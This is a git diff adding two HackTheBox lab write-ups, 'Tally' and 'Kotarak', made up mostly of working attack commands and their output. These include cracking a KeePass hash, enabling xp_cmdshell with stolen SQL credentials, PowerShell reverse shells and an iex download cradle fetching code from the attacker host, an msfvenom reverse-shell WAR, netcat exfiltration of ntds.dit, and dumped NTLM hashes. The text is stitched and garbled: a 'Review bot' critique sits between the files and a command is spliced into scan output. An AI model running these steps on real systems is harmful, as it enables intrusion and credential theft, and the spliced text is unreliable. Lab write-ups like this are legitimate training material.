+ └── Yenwi
+ └── Archive
+
+ 27 directories, 130 files
+
+
+And here we see something interesting, there is a keepass kdbx file in User/Tim/Files/tim.kdbx, so we're going to use keepass2john to extract the hash we need:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
+ → keepass2john tim.kdbx
+ tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da
+
+
+
+Save the hash somewhere, then use hashcat to crack it:
+
+
+ hashcat -m 13400 tim.hash /usr/share/wordlists/rockyou.txt
+
+
+
+and once it finishes hashcat gives us the password we need : simplementeyo
+
+  
+
+And we have new credentials! Finance:Acc0unting, and cisco:cisco123. So first let's investigate the ACCT share the keepass file hints us towards:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [User/Tim/Files]
+ → sudo -i
+ [sudo] password for nothing:
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
+ → mkdir /mnt/smb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
+ → mount -t cifs -o username=Finance password=Acc0unting //10.10.10.59/ACCT /mnt/smb
+ mount: bad usage
+ Try 'mount --help' for more information.
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [~]
+ → mount -t cifs -o username=Finance //10.10.10.59/ACCT /mnt/smb
+ 🔐 Password for Finance@//10.10.10.59/ACCT: **********
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
+ →cd /mnt/smb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
+ → ls -l
+ total 0
+ drwxr-xr-x 2 root root 0 Sep 17 2017 Customers
+ drwxr-xr-x 2 root root 0 Aug 28 2017 Fees
+ drwxr-xr-x 2 root root 0 Aug 28 2017 Invoices
+ drwxr-xr-x 2 root root 0 Sep 17 2017 Jess
+ drwxr-xr-x 2 root root 0 Aug 28 2017 Payroll
+ drwxr-xr-x 2 root root 0 Sep 1 2017 Reports
+ drwxr-xr-x 2 root root 0 Sep 17 2017 Tax
+ drwxr-xr-x 2 root root 0 Sep 13 2017 Transactions
+ drwxr-xr-x 2 root root 0 Sep 15 2017 zz_Archived
+ drwxr-xr-x 2 root root 0 Sep 17 2017 zz_Migration
+
+
+
+So the goal here was to navigate into zz_Migration/Binaries/New\ Folder
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [/mnt/smb]
+ → cd zz_Migration/Binaries/New\ Folder
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
+ → ls -l
+ total 676308
+ -rwxr-xr-x 1 root root 389188014 Sep 13 2017 crystal_reports_viewer_2016_sp04_51051980.zip
+ -rwxr-xr-x 1 root root 18159024 Sep 11 2017 Macabacus2016.exe
+ -rwxr-xr-x 1 root root 21906356 Aug 30 2017 Orchard.Web.1.7.3.zip
+ -rwxr-xr-x 1 root root 774200 Sep 17 2017 putty.exe
+ -rwxr-xr-x 1 root root 483824 Sep 15 2017 RpprtSetup.exe
+ -rwxr-xr-x 1 root root 254599112 Sep 11 2017 tableau-desktop-32bit-10-3-2.exe
+ -rwxr-xr-x 1 root root 215552 Sep 1 2017 tester.exe
+ -rwxr-xr-x 1 root root 7194312 Sep 13 2017 vcredist_x64.exe
+
+
+
+And here you had to extract passwords out of tester.exe using strings:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [zz_Migration/Binaries/New Folder]
+ → strings tester.exe | grep SQL
+ SQLSTATE:
+ DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
+
+
+
+So here we have credentials for a SQL server on port 1433 : sa:GWE3V65#6KFH93@4GWTG2G
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/11 ] [~]
+ → sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
+ sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
+ Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
+ This is free software with ABSOLUTELY NO WARRANTY
+ For more information type '\warranty'
+ 1> xp_cmdshell 'id'
+ 2> go
+ Msg 15281, Level 16, State 1
+ Server 'TALLY', Procedure 'xp_cmdshell', Line 1
+ SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the
+ security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more
+ information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
+ 1>
+
+
+
+So we're connected but component xp_cmdshell is turned off, so let's turn it on:
+
+
+ 1> EXEC SP_CONFIGURE 'xp_cmdshell',1
+ 2> reconfigure
+ 3> go
+ Msg 15123, Level 16, State 1
+ Server 'TALLY', Procedure 'sp_configure', Line 62
+ The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
+ (return status = 1)
+
+
+
+And it seems like the xp_cmdshell option doesn't exist, so let's enable advanced options:
+
+
+ 1> EXEC SP_CONFIGURE 'show advanced options', 1
+ 2> reconfigure
+ 3> go
+ Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
+ (return status = 0)
+ 1> EXEC SP_CONFIGURE 'xp_cmdshell', 1
+ 2> reconfigure
+ 3> go
+ Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
+ (return status = 0)
+
+ 1> xp_cmdshell "whoami"
+ 2> go
+
+ output
+ -------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ -------------------------------------------------------------------------------------------------
+
+ tally\sarah
+ NULL
+ (2 rows affected, return status = 0)
+
+
+And there we have it, we have code execution as the sarah user:
+
+
+
+ 1> xp_cmdshell "whoami /priv"
+ 2> go
+ output
+ -------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ ---------------------------------------------------------------------------------------------------------------------------------------------
+ -------------------------------------------------------------------------------------------------
+
+ NULL
+ PRIVILEGES INFORMATION
+ ----------------------
+ NULL
+ Privilege Name Description State
+ ============================= ========================================= ========
+ SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
+ SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
+ SeChangeNotifyPrivilege Bypass traverse checking Enabled
+ **SeImpersonatePrivilege Impersonate a client after authentication Enabled**
+ SeCreateGlobalPrivilege Create global objects Enabled
+ SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
+ NULL
+ (13 rows affected, return status = 0)
+
+
+And here we see that the SeImpersonatePrivilege is set to enabled therefore we should be able to do rottenpotato on this machine, but before that let's get a reverse shell using nishang's [InvokePowershellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
+ --2020-12-23 17:21:02-- https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.36.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.36.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 4339 (4.2K) [text/plain]
+ Saving to: ‘Invoke-PowerShellTcp.ps1’
+
+ Invoke-PowerShellTcp.ps1 100%[=======================================>] 4.24K --.-KB/s in 0s
+
+ 2020-12-23 17:21:02 (21.8 MB/s) - ‘Invoke-PowerShellTcp.ps1’ saved [4339/4339]
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001' >> Invoke-PowerShellTcp.ps1
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → cat Invoke-PowerShellTcp.ps1 | tail -n2
+
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → cat Invoke-PowerShellTcp.ps1 | tail -n5
+ Write-Error $_
+ }
+ }
+
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9001
+
+ [ 10.10.14.6/23 ] [ /dev/pts/14 ] [~/_HTB/Tally]
+ → mv Invoke-PowerShellTcp.ps1 rev9001.ps1
+
+
+
+`  
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56942
+ Windows PowerShell running as user Sarah on TALLY
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\Windows\system32>whoami
+ tally\sarah
+ PS C:\Windows\system32> cd /
+ PS C:\> cd Users
+ PS C:\Users> dir
+
+
+ Directory: C:\Users
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 18/09/2017 22:35 .NET v2.0
+ d----- 18/09/2017 22:35 .NET v2.0 Classic
+ d----- 30/08/2017 01:14 .NET v4.5
+ d----- 30/08/2017 01:14 .NET v4.5 Classic
+ d----- 17/09/2017 21:33 Administrator
+ d----- 18/09/2017 22:35 Classic .NET AppPool
+ d-r--- 21/11/2016 01:24 Public
+ d----- 13/10/2017 23:57 Sarah
+ d----- 12/10/2017 21:28 SQLSERVERAGENT
+ d----- 02/09/2017 22:46 SQLTELEMETRY
+ d----- 13/09/2017 21:27 Tim
+
+
+ PS C:\Users> cd Sarah
+ PS C:\Users\Sarah> cd Desktop
+ PS C:\Users\Sarah\Desktop> dir
+
+
+ Directory: C:\Users\Sarah\Desktop
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -ar--- 01/10/2017 22:32 916 browser.bat
+ -a---- 17/09/2017 21:50 845 FTP.lnk
+ -a---- 23/09/2017 21:11 297 note to tim (draft).txt
+ -a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
+ -a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
+ -a---- 17/09/2017 21:48 1914 SQLCMD.lnk
+ -a---- 21/09/2017 00:46 129 todo.txt
+ -ar--- 31/08/2017 02:04 32 user.txt
+ -a---- 17/09/2017 21:49 936 zz_Migration.lnk
+
+
+ PS C:\Users\Sarah\Desktop> type user.txt
+ beXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there you go! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc on this box we need to first take a look at sarah's desktop files:
+
+
+
+ PS C:\Users\Sarah\Desktop> dir
+
+
+ Directory: C:\Users\Sarah\Desktop
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -ar--- 01/10/2017 22:32 916 browser.bat
+ -a---- 17/09/2017 21:50 845 FTP.lnk
+ -a---- 23/09/2017 21:11 297 note to tim (draft).txt
+ -a---- 19/10/2017 21:49 17152 SPBestWarmUp.ps1
+ -a---- 19/10/2017 22:48 11010 SPBestWarmUp.xml
+ -a---- 17/09/2017 21:48 1914 SQLCMD.lnk
+ -a---- 21/09/2017 00:46 129 todo.txt
+ -ar--- 31/08/2017 02:04 32 user.txt
+ -a---- 17/09/2017 21:49 936 zz_Migration.lnk
+
+
+ PS C:\Users\Sarah\Desktop> type "note to tim (draft).txt"
+ Hi Tim,
+
+ As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
+
+ Thanks,
+ Sarah
+
+
+
+Basically here there are multiple ways to privesc, the first one being found in SPBestWarmUp.ps1 which basically is a script we can write to that is being executed every hour by the administrator account, so we're going to put in our second reverse shell payload:
+
+
+ PS C:\Users\Sarah\Desktop> echo "iex(new-object net.webclient).downloadstring('http://10.10.14.6:9005/rev9006.ps1')" > SPBestWarmUp.ps1
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/25 ] [~/_HTB/Tally]
+ → nc -lvnp 9006
+ listening on [any] 9006 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.59] 56986
+ Windows PowerShell running as user Administrator on TALLY
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\Users\Sarah\Desktop>whoami
+ tally\administrator
+
+ PS C:\Users\Sarah\Desktop>cd C:\Users\Administrator\Desktop
+
+ PS C:\Users\Administrator\Desktop>type root.txt
+ 60XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we have it!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
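Review bot: the `mount -t cifs -o username=Finance password=Acc0unting //10.10.10.59/ACCT /mnt/smb` line fails with 'mount: bad usage' because the password is passed as a separate argument instead of inside the `-o` option list; the working form is `-o username=Finance,password=Acc0unting`, or better `-o credentials=/path/to/file` so the password stays out of shell history (the wget line has the same issue, embedding the FTP password in the URL). Separately, the service scan `nmap -sCV -p21,80,81,135,139,445,808,1443` has a typo: the discovered port is 1433, which is why the output shows '1443/tcp closed ies-lm' and the SQL Server details only surface through the ms-sql-info host script; port 5985 (WinRM) from the first scan is also dropped from the list. The privesc section states that SPBestWarmUp.ps1 'is being executed every hour by the administrator account' without showing the evidence (the scheduled task definition or the file's ACL), the download cradle points at 10.10.14.6:9005/rev9006.ps1 while neither the HTTP server on 9005 nor the staging of rev9001.ps1 is shown, and the rottenpotato option raised after the `whoami /priv` output is never followed up. Finally the Conclusion again reads 'Here we can see the progress graph :' with no image after it.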
diff --git a/Hard/7.md b/Hard/7.md
new file mode 100644
index 0000000..910cc56
--- /dev/null
+++ b/Hard/7.md
@@ -0,0 +1,628 @@
+# Kotarak Writeup
+
+
+
+## Introduction :
+
+Kotarak is a hard linux box released back in september 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.55 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 8080/tcp on 10.10.10.55
+ Discovered open port 22/tcp on 10.10.10.55
+ Discovered open port 8009/tcp on 10.10.10.55
+ Discovered open port 60000/tcp on 10.10.10.55
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -sCV -p8080,22,8009,60000 10.10.10.55
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 22:50 CET
+ Nmap scan report for 10.10.10.55
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
+ | 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
+ |_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
+ 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
+ | ajp-methods:
+ | Supported methods: GET HEAD POST PUT DELETE OPTIONS
+ | Potentially risky methods: PUT DELETE
+ |_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
+ 8080/tcp open http Apache Tomcat 8.5.5
+ |_http-favicon: Apache Tomcat
+ | http-methods:
+ |_ Potentially risky methods: PUT DELETE
+ |_http-title: Apache Tomcat/8.5.5 - Error report
+ 60000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Kotarak Web Hosting
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+As our nmap scan points out, port 8080 seems to be interesting so let's investigate it:
+
+
+
+Most apache tomcat services have an important directory in /manager/html as you can see:
+
+
+
+Now here you can't bruteforce the password here because the service will block the account so let's keep poking around another port that our nmap scan picked up:
+
+
+
+and here we get an interesting page with a url prompt so we're going to use burpsuite's repeater on it:
+
+  
+
+So here we see there's a regex that matches the word file so we can't print out the files on the machine, next is we try if we can find local ports:
+
+
+
+It works for port 60000 but we know that already, let's use wfuzz to enumerate:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → wfuzz -c -z range,1-65535 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
+ Total requests: 65535
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000001: 200 2 L 0 W 2 Ch "1"
+ 000000039: 200 2 L 0 W 2 Ch "39"
+ 000000015: 200 2 L 0 W 2 Ch "15"
+ 000000003: 200 2 L 0 W 2 Ch "3"
+ 000000007: 200 2 L 0 W 2 Ch "7"
+ 000000031: 200 2 L 0 W 2 Ch "31"
+ 000000034: 200 2 L 0 W 2 Ch "34"
+ 000000033: 200 2 L 0 W 2 Ch "33"
+ 000000030: 200 2 L 0 W 2 Ch "30"
+ 000000029: 200 2 L 0 W 2 Ch "29"
+ 000000032: 200 2 L 0 W 2 Ch "32"
+ 000000028: 200 2 L 0 W 2 Ch "28"[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]
+ → msfvenom -l payloads
+
+ 000000038: 200 2 L 0 W 2 Ch "38"
+ 000000027: 200 2 L 0 W 2 Ch "27"
+ 000000023: 200 2 L 0 W 2 Ch "23"
+ 000000024: 200 2 L 0 W 2 Ch "24"
+ 000000025: 200 2 L 0 W 2 Ch "25"
+ 000000026: 200 2 L 0 W 2 Ch "26"
+ 000000022: 200 4 L 4 W 62 Ch "22"
+ 000000021: 200 2 L 0 W 2 Ch "21"
+ 000000020: 200 2 L 0 W 2 Ch "20"
+ 000000014: 200 2 L 0 W 2 Ch "14"
+ 000000017: 200 2 L 0 W 2 Ch "17"
+ 000000018: 200 2 L 0 W 2 Ch "18"
+ 000000019: 200 2 L 0 W 2 Ch "19"
+ 000000016: 200 2 L 0 W 2 Ch "16"
+ 000000013: 200 2 L 0 W 2 Ch "13"
+ 000000012: 200 2 L 0 W 2 Ch "12"
+ 000000008: 200 2 L 0 W 2 Ch "8"
+ 000000011: 200 2 L 0 W 2 Ch "11"
+ 000000009: 200 2 L 0 W 2 Ch "9"
+ 000000006: 200 2 L 0 W 2 Ch "6"
+ 000000010: 200 2 L 0 W 2 Ch "10"
+ 000000005: 200 2 L 0 W 2 Ch "5"
+ 000000002: 200 2 L 0 W 2 Ch "2"
+ 000000054: 200 2 L 0 W 2 Ch "54"
+ 000000004: 200 2 L 0 W 2 Ch "4"
+ 000000042: 200 2 L 0 W 2 Ch "42"
+ 000000046: 200 2 L 0 W 2 Ch "46"
+
+
+
+here we can see the junk responses that are only 2 responses characters long, therefore we're going to filter out the 2 chars long responses with the option --hl=2 :
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php\?path\=http://localhost:FUZZ
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
+ Total requests: 65535
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000022: 200 4 L 4 W 62 Ch "22"
+ 000000090: 200 11 L 18 W 156 Ch "90"
+ 000000110: 200 17 L 24 W 187 Ch "110"
+ 000000200: 200 3 L 2 W 22 Ch "200"
+ 000000320: 200 26 L 109 W 1232 Ch "320"
+ 000000888: 200 78 L 265 W 3955 Ch "888"
+
+ Total time: 262.3381
+ Processed Requests: 54927
+ Filtered Requests: 54921
+ Requests/sec.: 209.3748
+
+ /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received
+
+
+
+So here we have a few interesting responses : port 22, 90, 110, 200, 320, and 888. you would have to test each one of them but the important one right now is 888:
+
+
+
+Do ctrl+U to view sourcecode:
+
+
+
+and navigate to ?doc=backup:
+
+
+
+select url and CTRL+U to url encode it:
+
+
+
+and we found some credentials ! admin:3@g01PdhB! So let's try to login on the tomcat login page we found earlier at http://10.10.10.55:8080/manager/html
+
+
+
+And we now have access to the tomcat web manager, From here we want to upload a malicious WAR file to get us a shell.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~]
+ → msfvenom -l payloads | grep java
+ java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
+ java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
+ java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
+ java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
+ java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
+ java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
+ java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
+ java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
+ java/shell_reverse_tcp Connect back to attacker and spawn a command shell
+
+
+
+Here we want msvenom's java/jsp_shell_reverse_tcp
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=9090 -f war > ippsecrocks.war
+ Payload size: 1093 bytes
+ Final size of war file: 1093 bytes
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → l
+ total 12K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 22 14:17 .
+ drwxr-xr-x 5 nothing nothing 4.0K Dec 21 17:43 ..
+ -rw-r--r-- 1 nothing nothing 1.1K Dec 22 14:17 ippsecrocks.war
+
+
+
+`  
+
+Now that we got a shell, let's upgrade it to a fully interactive shell:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
+ → nc -lvnp 9090
+ listening on [any] 9090 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 42176
+ id
+ uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
+ which python
+ /usr/bin/python
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ tomcat@kotarak-dmz:/$ ^Z
+ [1] + 257499 suspended nc -lvnp 9090
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~]
+ → stty raw -echo ; fg
+ [1] + 257499 continued nc -lvnp 9090
+
+ tomcat@kotarak-dmz:/$
+
+
+What you need to remember to get a fully interactive reverse shell is the following:
+
+
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ CTRL+Z (or ^Z)
+ stty raw -echo ; fg
+ export TERM=screen-256color
+ export SHELL=bash
+ stty rows 40 columns 125
+ reset
+
+
+
+And now here we have a shell that we can clear, auto-complete and use vi from.
+
+
+
+ tomcat@kotarak-dmz:/$ id
+ uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
+ tomcat@kotarak-dmz:/$ ls -lash backups/
+ total 12K
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
+ 4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 backups
+ tomcat@kotarak-dmz:/$ ls -lash backups/backups/
+ total 12K
+ 4.0K drwxr-xr-x 2 root root 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 21 2017 ..
+ 4.0K -rw-r----- 1 root root 2.3K Jul 12 2017 tomcat-users.xml
+ tomcat@kotarak-dmz:/$ cat backups/backups/tomcat-users.xml
+ cat: backups/backups/tomcat-users.xml: Permission denied
+ tomcat@kotarak-dmz:/$ ls -lash /home
+ total 16K
+ 4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 27 root root 4.0K Aug 29 2017 ..
+ 4.0K drwxr-xr-x 4 atanas atanas 4.0K Aug 29 2017 atanas
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 tomcat
+ tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/
+ total 12K
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Jul 21 2017 ..
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 to_archive
+ tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/
+ total 12K
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
+ 4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 pentest_data
+ tomcat@kotarak-dmz:/$ ls -lash /home/tomcat/to_archive/pentest_data/
+ total 28M
+ 4.0K drwxr-xr-x 2 tomcat tomcat 4.0K Jul 21 2017 .
+ 4.0K drwxr-xr-x 3 tomcat tomcat 4.0K Jul 21 2017 ..
+ 17M -rw-r--r-- 1 tomcat tomcat 17M Jul 21 2017 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
+ 12M -rw-r--r-- 1 tomcat tomcat 12M Jul 21 2017 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
+
+
+Here after poking around a bit we found psexec ntds .dit and .bin files, which are normally found on windows active directory controllers, and it's what contains a windows active directory informations (policies, users, and most importantly passwords.) so let's get these files into our local machine:
+
+_Terminal 1:_
+
+
+ nc 10.10.14.6 9093 < file.bin
+ nc 10.10.14.6 9094 < file.dit
+
+
+` _Terminal 2:_
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → nc -lvnp 9093 > SYSTEM
+ listening on [any] 9093 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 48340
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → nc -lvnp 9094 > ntds.dit
+ listening on [any] 9094 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 32822
+
+ [ 10.10.14.6/23 ] [ /dev/pts/15 ] [~/_HTB/Kotarak]
+ → file *
+ ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
+ SYSTEM: MS Windows registry file, NT/2000 or above
+
+
+
+Now that we have what we needed, let's use impacket to dump the secrets using both files:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
+ → impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ [*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
+ [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+ [*] Searching for pekList, be patient
+ [*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
+ [*] Reading and decrypting hashes from ntds.dit
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
+ Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
+ krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
+ WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
+ WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
+ WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
